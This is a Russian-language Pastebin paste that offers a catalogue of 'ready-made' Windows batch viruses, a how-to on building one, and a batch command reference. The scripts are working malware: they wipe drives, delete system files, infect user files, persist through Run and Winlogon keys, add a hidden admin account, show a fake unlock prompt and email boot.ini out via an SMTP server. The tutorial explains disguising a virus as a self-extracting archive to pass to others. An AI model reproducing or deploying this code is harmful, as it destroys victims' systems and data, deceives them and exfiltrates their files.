API tools faq
paste
Advertisement
zetlnd

Untitled

zetlnd
Apr 9th, 2018
84
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.73 KB | None | 0 0
raw download clone embed print report
  1. Оглавление
  2. Готовые bat вирусы 2
  3. Простенькие вирусы 2
  4. Убирает рабочий стол 2
  5. Выключается компьютер 2
  6. Перезагрузка компьютера 2
  7. Запрещает запускать программы 2
  8. Удаление дров 2
  9. Удаляет звуки Windows 2
  10. Запрещает заходить в панель управления 2
  11. Запрещает комбинацию Ctrl-Alt-Delete 3
  12. Меняет местами значение кнопок мыши 3
  13. Удаляет курсор мыши 3
  14. Меняет название корзины 3
  15. Убирает панель управления 3
  16. Серьезные вирусы 4
  17. Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) 4
  18. Удаляет все файлы в program files 4
  19. Убивает процесс explorer.exe 4
  20. Создает миллион папок 4
  21. Удаляет все драйвера, которые установлены на компьютере 4
  22. Удаляет команду DEL 4
  23. Будет открывать бесконечно Пэинт 4
  24. Изменяет расширение всех ярлыков на .txt 4
  25. Заражает Autoexec 4
  26. Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить) 4
  27. сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать. 4
  28. Меняет местами кнопки мыши,но обратная смена не возможна) 4
  29. Удаляет ядро системы 4
  30. Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге) 5
  31. Вирус заражает *.JPG в текущем каталоге 5
  32. Жестокие вирусы 6
  33. У вашего ламера будет глючить компьютер. 6
  34. Вирус который убивает Винду. Не проверяйте на своем компьютере=) 7
  35. Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует) 11
  36. Добавляет программу в автозагрузку ОС 12
  37. Создаем вирус 13
  38. Команды для BAT-файлов 15
  39.  
  40. Готовые bat вирусы
  41.  
  42. Здесь готовые Bat-вирусы. Просто вставляем код в bat файл и все, если не знаете как создать bat файл читаем тут
  43. Простенькие вирусы
  44. Убирает рабочий стол
  45. @echo off
  46. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
  47. Выключается компьютер
  48. @echo off
  49. shutdown -s -t 1 -c "lol" >nul
  50. Перезагрузка компьютера
  51. @echo off
  52. shutdown -r -t 1 -c "lol" >nul
  53. Запрещает запускать программы
  54. @echo off
  55. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
  56. Удаление дров
  57. @echo off
  58. del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul
  59. Удаляет звуки Windows
  60. @echo off
  61. del "%SystemRoot%\Media" /q >nul
  62. Запрещает заходить в панель управления
  63. @echo off
  64. reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
  65. /v NoControlPanel /t REG_DWORD /d 1 /f >nul
  66.  
  67.  
  68.  
  69. Запрещает комбинацию Ctrl-Alt-Delete
  70. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
  71. Меняет местами значение кнопок мыши
  72. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  73. Удаляет курсор мыши
  74. del "%SystemRoot%Cursors*.*" >nul
  75. Меняет название корзины
  76. reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F
  77. Убирает панель управления
  78. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  79.  
  80.  
  81.  
  82. Серьезные вирусы
  83. Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя)
  84. rd [Буква_Диск]: /s /q
  85. Удаляет все файлы в program files
  86. del c:Program Files/q
  87. Убивает процесс explorer.exe
  88. taskkill /f /im explorer.exe >nul
  89. Создает миллион папок
  90. FOR /L %%i IN (1,1,1000000) DO md %%i
  91. Удаляет все драйвера, которые установлены на компьютере
  92. del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul
  93. Удаляет команду DEL
  94. del %0
  95. Будет открывать бесконечно Пэинт
  96. :x
  97. Start mspaint
  98. goto x
  99. Изменяет расширение всех ярлыков на .txt
  100. assoc .lnk=.txt
  101. Заражает Autoexec
  102. copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
  103. reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul
  104. Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить)
  105. @echo off
  106. chcp 1251
  107. net user SUPPORT_388945a0 /delete
  108. net user hacker hack /add
  109. net localgroup Администраторы hacker /add
  110. net localgroup Пользователи SUPPORT_388945a0 /del
  111. reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y
  112. сбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать.
  113. rundll32 user,disableoemlayer
  114. Меняет местами кнопки мыши,но обратная смена не возможна)
  115. rundll32 user,SwapMouseButton
  116. Удаляет ядро системы
  117. del %systemroot%\system32\HAL.dll
  118.  
  119.  
  120.  
  121. Заражает *.jpg *.mp3 *.doc *.htm? *.xls. (Заражает не только в текущем каталоге, но и надкаталоге)
  122. @echo off%[MrWeb]%
  123. if '%1=='In_ goto MrWebin
  124. if exist c:\MrWeb.bat goto MrWebru
  125. if not exist %0 goto MrWeben
  126. find "MrWeb"<%0>c:\MrWeb.bat
  127. attrib +h c:\MrWeb.bat
  128. :MrWebru
  129. for %%g in (..\*.jpg ..\*.doc ..\*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:\MrWeb In_ %%ggoto MrWeben
  130. :MrWebin
  131. if exist %2.bat goto MrWeben
  132. type c:\MrWeb.bat>>%2.bat
  133. echo start %2>>%2.bat%[MrWeb]%
  134. :MrWeben
  135. Вирус заражает *.JPG в текущем каталоге
  136. @echo off%[MrWeb]%
  137. if '%1=='In_ goto MrWebin
  138. if exist c:\MrWeb.bat goto MrWebru
  139. if not exist %0 goto MrWeben
  140. find "MrWeb"<%0>c:\MrWeb.bat
  141. attrib +h c:\MrWeb.bat
  142. :MrWebru
  143. for %%g in (*.jpg) do call c:\MrWeb In_ %%g
  144. goto MrWeben
  145. :MrWebin
  146. if exist %2.bat goto MrWeben
  147. type c:\MrWeb.bat>>%2.bat
  148. echo start %2>>%2.bat%[MrWeb]%
  149. :MrWeben
  150.  
  151.  
  152.  
  153. Жестокие вирусы
  154. У вашего ламера будет глючить компьютер.
  155. @echo off
  156. echo Set fso = CreateObject("Scripting.FileSystemObject") > %systemdrive%\windows\system32\rundll32.vbs
  157. echo do >> %systemdrive%\windows\system32\rundll32.vbs
  158. echo Set tx = fso.CreateTextFile("%systemdrive%\windows\system32\rundll32.dat", True) >> %systemdrive%\windows\system32\rundll32.vbs
  159. echo tx.WriteBlankLines(100000000) >> %systemdrive%\windows\system32\rundll32.vbs
  160. echo tx.close >> %systemdrive%\windows\system32\rundll32.vbs
  161. echo FSO.DeleteFile "%systemdrive%\windows\system32\rundll32.dat" >> %systemdrive%\windows\system32\rundll32.vbs
  162. echo loop >> %systemdrive%\windows\system32\rundll32.vbs
  163.  
  164. start %systemdrive%\windows\system32\rundll32.vbs
  165.  
  166. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v system_host_run /t REG_SZ /d %systemdrive%\windows\system32\rundll32.vbs /f
  167.  
  168.  
  169.  
  170. Вирус который убивает Винду. Не проверяйте на своем компьютере=)
  171. @echo This virus created by LIZA
  172. @echo Virus: pcforumhack.ru™ Virus
  173. @echo Autor: LIZA
  174. @echo off
  175. echo Chr(39)>%temp%\temp1.vbs
  176. echo Chr(39)>%temp%\temp2.vbs
  177. echo on error resume next > %temp%\temp.vbs
  178. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp.vbs
  179. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp.vbs
  180. reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ¶§=%0
  181. copy %¶§% %SystemRoot%\user32dll.bat
  182. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d %SystemRoot%\user32dll.bat /f
  183. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  184. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  185. echo fso.deletefile "C:\ntldr",1 >> %temp%\temp.vbs
  186. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  187. reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  188. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  189. reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  190. echo fso.deletefolder "D:\Windows",1 >> %temp%\temp.vbs
  191. echo fso.deletefolder "I:\Windows",1 >> %temp%\temp.vbs
  192. echo fso.deletefolder "C:\Windows",1 >> %temp%\temp.vbs
  193. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  194. echo fso.deletefile sr+"\system32\hal.dll",1 >> %temp%\temp.vbs
  195. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  196. echo fso.deletefolder sr+"\system32\dllcache",1 >> %temp%\temp.vbs
  197. echo sr=s.RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot") >> %temp%\temp.vbs
  198. echo fso.deletefolder sr+"\system32\drives",1 >> %temp%\temp.vbs
  199. echo s.regwrite "HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\LocalizedString","forum.whack.ru™">>%temp%\temp.vbs
  200. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","forum.whack.ru™">>%temp%\temp.vbs
  201. echo s.regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization","forum.whack.ru™">>%temp%\temp.vbs
  202. echo on error resume next > %temp%\temp1.vbs
  203. echo set FSO=createobject("scripting.filesystemobject")>>%temp%\temp1.vbs
  204. echo do>>%temp%\temp1.vbs
  205. echo fso.getfile ("A:\")>>%temp%\temp1.vbs
  206. echo loop>>%temp%\temp1.vbs
  207. echo on error resume next > %temp%\temp2.vbs
  208. echo Set S = CreateObject("Wscript.Shell") >> %temp%\temp2.vbs
  209. echo do>>%temp%\temp2.vbs
  210. echo execute"S.Run ""%comspec% /c echo "" & Chr(7), 0, True">>%temp%\temp2.vbs
  211. echo loop>>%temp%\temp2.vbs
  212. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  213. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  214. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  215. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  216. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  217. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  218. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  219. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  220. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  221. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  222. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  223. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  224. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  225. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  226. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  227. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  228. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  229. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  230. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  231. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  232. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  233. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  234. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  235. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  236. reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  237. echo set application=createobject("shell.application")>>%temp%\temp.vbs
  238. echo application.minimizeall>>%temp%\temp.vbs
  239. reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  240. start rundll32 user32, SwapMouseButton
  241. reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  242. echo i=50 >> %temp%\temp.vbs
  243. echo while i^>0 or i^<0 >> %temp%\temp.vbs
  244. echo S.popup "forum.whack.ru™",0, "forum.whack.ru™",0+16 >> %temp%\temp.vbs
  245. echo i=i-1 >> %temp%\temp.vbs
  246. echo wend >> %temp%\temp.vbs
  247. echo do >> %temp%\temp.vbs
  248. echo wscript.sleep 200 >> %temp%\temp.vbs
  249. echo s.sendkeys"{capslock}" >> %temp%\temp.vbs
  250. echo wscript.sleep 200 >> %temp%\temp.vbs
  251. echo s.sendkeys"{numlock}" >> %temp%\temp.vbs
  252. echo wscript.sleep 200 >> %temp%\temp.vbs
  253. echo s.sendkeys"{scrolllock}" >> %temp%\temp.vbs
  254. echo loop>> %temp%\temp.vbs
  255. echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %temp%\temp.vbs
  256. echo Set colCDROMs = oWMP.cdromCollection >> %temp%\temp.vbs
  257. echo if colCDROMs.Count ^>= 1 then >> %temp%\temp.vbs
  258. echo For i = 0 to colCDROMs.Count - 1 >> %temp%\temp.vbs
  259. echo colCDROMs.Item(i).eject >> %temp%\temp.vbs
  260. echo next >> %temp%\temp.vbs
  261. echo End If >> %temp%\temp.vbs
  262. echo Call SendPost("smtp.mail.ru", "forum.whack.ru™@mail.ru", "support@mail.ru", "...", "Копм заражен!") >> %temp%\temp.vbs
  263. echo Function SendPost(strSMTP_Server, strTo, strFrom, strSubject, strBody) >> %temp%\temp.vbs
  264. echo Set iMsg = CreateObject("CDO.Message") >> %temp%\temp.vbs
  265. echo Set iConf = CreateObject("CDO.Configuration") >> %temp%\temp.vbs
  266. echo Set Flds = iConf.Fields >> %temp%\temp.vbs
  267. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 >> %temp%\temp.vbs
  268. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 >> %temp%\temp.vbs
  269. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "support" >> %temp%\temp.vbs
  270. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "support" >> %temp%\temp.vbs
  271. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" >> %temp%\temp.vbs
  272. echo Flds.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25 >> %temp%\temp.vbs
  273. echo Flds.Update >> %temp%\temp.vbs
  274. echo iMsg.Configuration = iConf >> %temp%\temp.vbs
  275. echo iMsg.To = strTo >> %temp%\temp.vbs
  276. echo iMsg.From = strFrom >> %temp%\temp.vbs
  277. echo iMsg.Subject = strSubject >> %temp%\temp.vbs
  278. echo iMsg.TextBody = strBody >> %temp%\temp.vbs
  279. echo iMsg.AddAttachment "c:\boot.ini" >> %temp%\temp.vbs
  280. echo iMsg.Send >> %temp%\temp.vbs
  281. echo End Function >> %temp%\temp.vbs
  282. echo Set iMsg = Nothing >> %temp%\temp.vbs
  283. echo Set iConf = Nothing >> %temp%\temp.vbs
  284. echo Set Flds = Nothing >> %temp%\temp.vbs
  285.  
  286. echo s.run "shutdown -r -t 0 -c ""pcforumhack.ru™"" -f",1 >> %temp%\temp.vbs
  287. start %temp%\temp.vbs
  288. start %temp%\temp1.vbs
  289. start %temp%\temp2.vbs
  290.  
  291.  
  292.  
  293. Вирус полностью блокирует систему при следующем запуске Windows. Даже в безопасном режиме, выключает диспетчер задач. Чтобы разблокировать компьютер можно введя код 200393! (Но он не разблокирует)
  294. @echo off
  295. CHCP 1251
  296. cls
  297. Set Yvaga=На вашем компьютере найден вирус.
  298. Set pass=Пароль
  299. Set pas=Введите пароль.
  300. Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль
  301. Set dim=Выключаю вирус...
  302. title Внимание!!!
  303. CHCP 866
  304. IF EXIST C:\windows\boot.bat (
  305. goto ok )
  306. cls
  307. IF NOT EXIST C:\windows\boot.bat (
  308. ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
  309. ECHO. >> C:\0.reg
  310. ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
  311. ECHO. >> C:\0.reg
  312. ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
  313. start/wait regedit -s C:\0.reg
  314. del C:\0.reg
  315. ECHO @echo off >>C:\windows\boot.bat
  316. ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
  317. ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
  318. ECHO start sys.bat >>C:\windows\boot.bat
  319. attrib +r +a +s +h C:\windows\boot.bat
  320. copy virus.bat c:\windows\sys.bat
  321. attrib +r +a +s +h C:\windows\sys.bat
  322. GOTO end)
  323. :ok
  324. cls
  325. Echo %Yvaga%
  326. echo.
  327. echo %virus%
  328. echo %pas%
  329. set /a choise = 0
  330. set /p choise=%pass%:
  331. if "%choise%" == "101" goto gold
  332. if "%choise%" == "200393" goto status
  333. exit
  334. :status
  335. echo %dim%
  336. attrib -r -a -s -h C:\windows\boot.bat
  337. del C:\windows\boot.bat
  338. attrib -r -a -s -h C:\windows\sys.bat
  339. del C:\windows\sys.bat
  340. cls
  341. :gold
  342. start C:\
  343. :end
  344.  
  345. Добавляет программу в автозагрузку ОС
  346. copy ""%0"" "%SystemRoot%\system32\File.bat"
  347. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
  348. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  349.  
  350. Этот вирус,блокирует все программы,но интернет работает.
  351.  
  352. @Echo off
  353. Echo Virus Loading
  354. Date 13.09.96
  355. If exist c:ski.bat goto abc
  356. Copy %0 c:ski.bat
  357. Attrib +h c:ski.bat
  358. Echo c:ski.bat >>autoexec.bat
  359. :abc
  360. md PRIDUROK
  361. md LUZER
  362. md DURAK
  363. md LAMER
  364. Label E: PRIDUROK
  365. assoc .exe=.mp3
  366. del c:Program Files/q
  367. Echo VIRUS LOAD
  368.  
  369.  
  370.  
  371. Создаем вирус
  372. В этой статье мы научимся создавать вредоносные программки, что-то вроде вируса. Где мы будем использовать штатные средства Windows.
  373. И так начнём:
  374. Для начала нам надо создать Текстовый документ.txt
  375. Правой кнопкой мыши по рабочему столу, дальше "создать" и выбираем "Текстовый документ"
  376. Открываем его, дальше нам надо забить в него команды bat файлов
  377. Примеры ниже:
  378. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul – Поменять местами значения кнопок мыши
  379. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies ExplorerRestrictRun /v 1 /t REG_DWORD /d %SystemRoot%explorer.exe /f >nul – Делает невозможным запуск приложений
  380. time 0:00 >nul – Поставить время на 00:00
  381. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul – Запретить редактирование реестра вручную
  382. del "%SystemRoot%Cursors*.*" >nul – Удалить курсор мыши
  383. del "%SystemRoot%Media" /q >nul – Удалить системные звуки Windows
  384. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul – Запретить вызов панели управления
  385. reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPolicies Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul – Убрать рабочий стол
  386. shutdown -r -t 1 -c "lol" -f >nul – Форсированная перезагрузка ПК
  387. shutdown -s -t 1 -c "lol" -f >nul – Форсированное выключение ПК
  388. taskkill /f /im explorer.exe >nul – Убить процесс Explorer.exe
  389. net share "ResName"="C:" >nul – Расшарить диск C:
  390. label C:Диск >nul – Переименовать диск С:
  391. msg * "Текст сообщения" >nul – Показать Windows-стилизованное сообщение с кнопкой ОК
  392. del "%0" >nul – Самоликвидация вирус
  393. Давайте мы попробуем поменять местами значения кнопок мыши, напишем в текстовом документе.txt это:
  394. %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
  395.  
  396.  
  397. Сохраняем, и чтобы команда заработала нам надо переименовать "Текстовый документ.txt" вместо txt пишем bat, у нас должно получится вот так "Текстовый документ.bat" (Без кавычек)
  398.  
  399. Вот и все небольшой простенький вредоносный вирус создан.
  400. Если хотите убедиться,что вирус создан открываем Текстовый документ.bat
  401. И радуемся)) Если хотите вернуть местами кнопки мыши, то
  402. Заходим в Панель управления заходите в файл под названием "Мышь"
  403. Убираем галочку где написано "обменять назначение кнопок», нажимаете применить. Вот и все.
  404. Если хотите пошутить над другом или подкинуть вирус то делаем так:
  405. Ваш созданный вирус bat добавляем в архив, надеюсь все знают, как это делается. Правой кнопкой мыши на файле и добавить в архив.
  406. Мы зашли в "Имя и Параметры архива», ставим галочку где написано "Создать SFX-архив"
  407. Потом заходим "Дополнительно" дальше в "Параметры SFX..."
  408. Где написано "Выполнить после распаковки «пишем НАЗВАНИЕ вашего bat файла, например, если у вас название вашего bat файла "Текстовый документ.bat" то в поле "Выполнить после распаковки" пишем Текстовый документ.bat
  409. И теперь если открыть вот этот наш архив (вирус), надо нажать "Извлечь», и вирус автоматический сработает.
  410.  
  411.  
  412. Команды для BAT-файлов
  413. Это команды, которые используются для BAT файлов.
  414. Ну в общем так сказать, для написания вирусов.
  415.  
  416.  
  417. ASSOC - Отображает или модифицирует связи расширений файлов
  418. AT - Планирует команды и программы для выполнения на компьютере.
  419. ATTRIB - Отображает или изменяет атрибуты файла.
  420. BREAK - Устанавливает или отменяет проверку комбинации [Ctrl+C].
  421. CACLS - Отображает или модифицирует списки управления доступом (ACLs) для файлов.
  422. CALL - Вызывает один *.BAT-файл из другого.
  423. CD - Отображает имя или изменяет имя текущей директории.
  424. CHCP - Отображает или устанавливает номер активной кодовой страницы.
  425. CHDIR - Отображает имя или изменяет имя текущей директории.
  426. CHKDSK - Проверяет диск и отображает отчет о состоянии.
  427. CLS - Очищает экран.
  428. CMD - Стартует новый экземпляр интерпретатора команд Windows NT.
  429. COLOR - Устанавливает цвета по умолчанию для переднего и заднего плана консоли.
  430. COMMAND - Стартует новую копию интерпретатора команд Windows.
  431. COMP - Сравнивает содержимое двух файлов или установки файлов.
  432. COMPACT - Отображает или видоизменяет сжатие файлов на патрициях Windows NT(NTFS).
  433. CONVERT - Конвертирует FAT томов к формату файловой системы Windows NT(NTFS). Вы не можете конвертировать текущий диск.
  434. COPY - Копирует один или больше файлов на другое место.
  435. CTTY - Изменяет терминальное устройство, используемое для управления вашей системой.
  436. DATE - Отображает или устанавливает дату.
  437. DEL - Удаляет один или более файлов.
  438. DEBUG - Выполняет отладку, тестирование программ и редактирование инструментальных средств.
  439. DIR - Отображает список файлов и поддиректорий в директории.
  440. DISKCOMP - Сравнивает содержимое двух дискет.
  441. DISKCOPY - Копирует содержимое одной дискеты на другую.
  442. DOSKEY - Редактирует командные строки, восстанавливает команды Windows и создает макрос.
  443. ECHO - Отображает сообщения, или включает/выключает вывод команд.
  444. EMM386 - Включает/выключает поддержку расширенной памяти EMM386.
  445. ENDLOCAL - Заканчивает локализацию изменений окружающей среды в *.BAT-файле.
  446. ERASE - Удаляет один или более файлов.
  447. EXIT - Прекращает выполнение программы (интерпретатор команд).
  448. EXTRACT - Средство извлечения информации из CAB - файлов.
  449. FC - Сравнивает два файла или установки файлов, и отображает различие между ними.
  450. FIND - Ищет текстовую строку в файле или файлах.
  451. FINDSTR - Поиск строк в файлах.
  452. FOR - Выполняет указанную команду для каждого файла в наборе файлов.
  453. FORMAT - Форматирует диск для использования с Windows.
  454. FTYPE - Отображает или модифицирует типы файлов, используемых в связях расширений.
  455. GOTO - Направляет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
  456. GRAFTABL - Способность Windows отображать символы псевдографики, вставленные в графическом режиме.
  457. HELP - Обеспечивает информацию Help для команд Windows.
  458. IF - Выполняет обработку условия в *.BAT-файле.
  459. KEYB - Конфигурирует клавиатуру для заданного языка.
  460. LABEL - Создает, изменяет, или удаляет метку тома на диске.
  461. LOADHIGH(LH) - Загружает программу в верхние адреса памяти.
  462. MD - Создает директорию.
  463. MEM - Отображает величину используемой и свободной памяти в вашей системе.
  464. MKDIR - Создает директорию.
  465. MODE - Конфигурирует системное устройство.
  466. MORE - Отображает вывод одного экрана за раз.
  467. MOVE - Перемещает один или более файлов из одной директории в другую на том же диске.
  468. NETSTAT - Отображает статистики протоколов и текущих сетевых соединений TCP/IP.
  469. NLSFUNC - Загружает информацию, специфическую для страны.
  470. PATH - Отображает или устанавливает путь поиска для выполняемых файлов.
  471. PAUSE - Приостанавливает обработку *.BAT-файла и отображает сообщение.
  472. POPD - Восстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
  473. PRINT - Печатает текстовый файл.
  474. PROMPT - Изменяет подсказку к командам Windows.
  475. PUSHD - Сохраняет текущую директорию, потом изменяет.
  476. RD - Удаляет директорию.
  477. RECOVER - Восстанавливает читаемую информацию с плохого или дефектного диска.
  478. REM - Записывает комментарии (примечания) в *.BAT-файлы или CONFIG.SYS.
  479. REN - Переименует файл или файлы.
  480. RENAME - Переименует файл или файлы.
  481. REPLACE - Заменяет файлы.
  482. RESTORE - Восстанавливает файлы, которые были архивированы с использованием команды BACKUP.
  483. RMDIR - Удаляет директорию.
  484. SET - Отображает, устанавливает или удаляет переменные среды Windows.
  485. SETLOCAL - Начинает локализацию изменений среды в *.BAT-файле.
  486. SETVER - Устанавливает номер версии MS-DOS, который Windows сообщает программе.
  487. SHIFT - Сдвигает позицию замещаемых параметров в *.BAT-файле.
